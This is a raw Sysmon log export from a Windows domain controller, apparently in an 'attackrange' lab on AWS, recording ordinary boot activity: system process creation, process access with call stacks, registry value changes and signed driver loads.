13:33:56.627{59A5CD1D-8E44-6005-0B00-00000000A301}856860C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+4e37c|C:\Windows\system32\lsasrv.dll+56c8f|C:\Windows\system32\lsasrv.dll+621fe|C:\Windows\system32\lsass.exe+2086|C:\Windows\system32\lsass.exe+1e11|C:\Windows\system32\lsass.exe+1551|C:\Windows\system32\lsass.exe+4708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:56.518{59A5CD1D-8E44-6005-0700-00000000A301}712716C:\Windows\system32\wininit.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1000000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wininit.exe+b9e0|C:\Windows\system32\wininit.exe+94ff|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.518{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.518{59A5CD1D-8E44-6005-0700-00000000A301}712716C:\Windows\system32\wininit.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.525{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft 
Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.471{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.471{59A5CD1D-8E44-6005-0700-00000000A301}712716C:\Windows\system32\wininit.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+5977|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.464{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exe10.0.14393.4169 (rs1_release.210107-1130)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=FEFC26105685C70D7260170489B5B520,SHA256=930F44F9A599937BDB23CF0C7EA4D158991B837D2A0975C15686CDD4198808E8,IMPHASH=A1C9FD59764D67AA201947276212F7CF{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.299{59A5CD1D-8E44-6005-0600-00000000A301}704708C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.302{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{59A5CD1D-8E44-6005-0600-00000000A301}704C:\Windows\System32\smss.exe- 10341000x8000000000000000738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:56.283{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0800-00000000A301}720C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.252{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Domainattackrange.local 13241300x8000000000000000736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.252{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Hostnamewin-dc-495 10341000x8000000000000000735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.236{59A5CD1D-8E43-6005-0400-00000000A301}632636C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.243{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{59A5CD1D-8E43-6005-0400-00000000A301}632C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000c0 0000007c 10341000x8000000000000000733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.236{59A5CD1D-8E44-6005-0600-00000000A301}704708C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.244{59A5CD1D-8E44-6005-0800-00000000A301}720C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{59A5CD1D-8E44-6005-0600-00000000A301}704C:\Windows\System32\smss.exe- 
10341000x8000000000000000731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.236{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0600-00000000A301}704C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.236{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0600-00000000A301}704C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.239{59A5CD1D-8E44-6005-0600-00000000A301}704C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000dc 0000007c C:\Windows\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{59A5CD1D-8E42-6005-0200-00000000A301}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x8000000000000000728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:56.236{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.143{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\VolatileSettings\{5b45201d-f2f2-4f3b-85bb-30ff1f953599}Binary Data 13241300x8000000000000000726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.143{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\Video\ServiceBasicDisplay 13241300x8000000000000000725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.143{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.143{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\CountDWORD (0x00000001) 13241300x8000000000000000723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.143{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\0DISPLAY\Default_Monitor\4&69f2b1a&0&UID0 10341000x8000000000000000722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:56.080{59A5CD1D-8E43-6005-0400-00000000A301}632636C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.095{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{59A5CD1D-8E43-6005-0400-00000000A301}632C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000c0 0000007c 10341000x8000000000000000720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:55.971{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}632C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 
10341000x8000000000000000719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:55.971{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}632C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:55.982{59A5CD1D-8E43-6005-0400-00000000A301}632C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000c0 0000007c C:\Windows\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{59A5CD1D-8E42-6005-0200-00000000A301}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 644600x8000000000000000717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:55.111C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x8000000000000000716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:55.111C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 
13241300x8000000000000000715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.440{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Leave)Binary Data 10341000x8000000000000000714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.440{59A5CD1D-8E42-6005-0200-00000000A301}448452C:\Windows\System32\smss.exe{59A5CD1D-8E42-6005-0300-00000000A301}588C:\Windows\system32\autochk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+4f84|\SystemRoot\System32\smss.exe+20b6|\SystemRoot\System32\smss.exe+65b2|\SystemRoot\System32\smss.exe+a3bb|\SystemRoot\System32\smss.exe+1652|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.422{59A5CD1D-8E42-6005-0300-00000000A301}588C:\Windows\System32\autochk.exe10.0.14393.4046 (rs1_release.201028-1803)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=4DEB2ED5AD84897181481B7567B3A90D,SHA256=85C6FF209D7BD3EF690F0AC7EEF0FE0CB66D26090887E9ADB1E63C8EEF5E2C7B,IMPHASH=5F30E54B15CF4B4A5C756AEF16C9668F{59A5CD1D-8E42-6005-0200-00000000A301}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x8000000000000000712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 
13241300x8000000000000000711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Enter)Binary Data 
13241300x8000000000000000703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\XEN\Unplug\NICSDWORD (0x00000001) 13241300x8000000000000000702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Enum\XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0\FriendlyNameAWS PV Network Device #0 13241300x8000000000000000701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMinorVersionDWORD (0x00000002) 644600x8000000000000000700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.033C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 13241300x8000000000000000699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMajorVersionDWORD (0x00000008) 13241300x8000000000000000698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMinorVersionDWORD (0x00000001) 13241300x8000000000000000697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMajorVersionDWORD (0x00000006) 
13241300x8000000000000000696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\CountDWORD (0x00000001) 13241300x8000000000000000694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\0XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0 13241300x8000000000000000693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.377{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xenvif\Addresses\002:79:60:fa:8a:64 644600x8000000000000000692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.018C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 13241300x8000000000000000691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.377{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.377{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 